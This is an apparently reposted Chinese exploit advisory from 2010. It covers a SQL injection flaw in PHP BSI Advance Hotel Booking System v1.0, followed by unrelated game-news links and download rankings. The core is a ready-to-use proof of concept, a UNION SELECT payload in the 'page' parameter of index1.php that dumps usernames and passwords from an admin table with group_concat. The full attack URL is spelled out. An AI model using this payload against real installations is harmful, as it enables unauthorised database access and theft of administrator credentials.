PHP BSI Advance Hotel Booking System v1.0 SQL Inje

时间：2010-11-14 来源：黑白前线

发布日期：2010-11.14
发布作者：v3n0m

影响版本：1.0
官方地址：http://www.bestsoftinc.com

漏洞类型：SQL注入
漏洞描述：过滤不严导致SQL注入漏洞

Exploit & p0c

_____________

-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--

http://127.0.0.1/[path]/index1.php?page=[SQLi]

http://127.0.0.1/[path]/index1.php?page=-9999+union+all+select+1,group_concat(username,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15+from+bsi_adhsdgsvfe--

标签分类： SQL注入

相关阅读更多 +

三国杀界徐盛和徐盛有什么区别(三国杀界徐盛和白马) 游戏资讯 2025-06-04
上古卷轴5炼金配方介绍(上古卷轴5炼金等级怎么刷) 游戏资讯 2025-06-04
艾尔登法环黑夜君临怎么治疗和加血(艾尔登法环黑夜君临) 游戏资讯 2025-06-04
老滚5（上古卷轴5）怎么结婚(老滚5上古卷轴要送出去吗) 游戏资讯 2025-06-04
开视频会议穿正装，下半身睡裤其他资讯 2025-06-04

排行榜更多 +

瓢虫少女

飞行射击下载

潜艇鱼雷

飞行射击下载

网络掠夺者

飞行射击下载

4
运输飞机模拟
51.73MB · 93℃

1970-01-01

下载
5
带枪重回中世纪
84.07MB · 90℃

1970-01-01

下载
6
野外狙击生存最新版
80.60MB · 96℃

1970-01-01

下载